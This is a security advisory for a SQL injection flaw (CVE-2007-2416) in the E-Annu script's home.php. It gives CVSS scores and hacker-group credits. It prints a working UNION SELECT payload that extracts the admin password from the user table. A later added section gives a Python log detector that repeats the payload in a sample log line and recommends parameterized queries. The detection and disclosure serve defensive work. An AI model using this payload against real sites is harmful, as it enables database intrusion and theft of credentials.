Bug: E-Annu (home.php) Remote SQL Injection Vulnerability ( Ascii Version )


E-Annu (home.php) Remote SQL Injection Vulnerability

Published: 2007.05.02
Credit: ilker kandemir
Risk: Medium
CWE: CWE-89
CVE: CVE-2007-2416
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------AYYILDIZ.ORG PreSents...

Script: E-Annu

Script D.: http://www.alic.ch/sources/annu.rar
Script Demo: http://www.autocash.ch/annu/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info: */ AYYILDIZ was here before you were. */

-------------------------------------------------Exploit:

home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/
**/WHERE/**/user_id=1/*

-------------------------------------------------

Ad space: Turkistiklal.com

-------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,X-Hacker,Ajann
Special Tnx: AYYILDIZ.ORG
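
A detection check for the request pattern in this advisory, as an added example that is not part of the original advisory or of the E-Annu code: it percent-decodes each query parameter of a request to home.php, treats /* */ comments as whitespace, and flags UNION SELECT in the result. The function names, log lines and IP addresses are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# /* ... */ comments act as whitespace in MySQL; a trailing unterminated /*
# (as in the advisory's string) comments out the rest of the query.
COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Replace SQL comments with a space and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", COMMENT.sub(" ", value)).strip()

def suspicious_params(target, script="home.php"):
    """Return (name, normalized value) for each query parameter of a request
    to `script` whose decoded, comment-stripped value contains UNION SELECT."""
    parts = urlsplit(target)
    if not parts.path.endswith("/" + script):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        norm = normalize(value)  # parse_qsl has already percent-decoded
        if UNION_SELECT.search(norm):
            hits.append((name, norm))
    return hits

def scan(log_lines):
    """Return (line number, client IP, hits) for each flagged access-log line."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, line.split()[0], hits))
    return findings

# Constructed sample lines (documentation IP addresses, assumed log format).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2007:10:00:01 +0000] "GET /home.php?a=garage HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/May/2007:10:00:09 +0000] "GET /home.php?a=%27/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/**/WHERE/**/user_id=1/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [02/May/2007:10:01:30 +0000] "GET /home.php?a=credit+union HTTP/1.1" 200 4977',
]

if __name__ == "__main__":
    for number, client, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {client} -> {hits}")
```

A match on the normalized value is a triage signal for log review; the fix for CWE-89 itself is binding the a parameter through a parameterized query in home.php.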

Copyright 2014, cxsecurity.com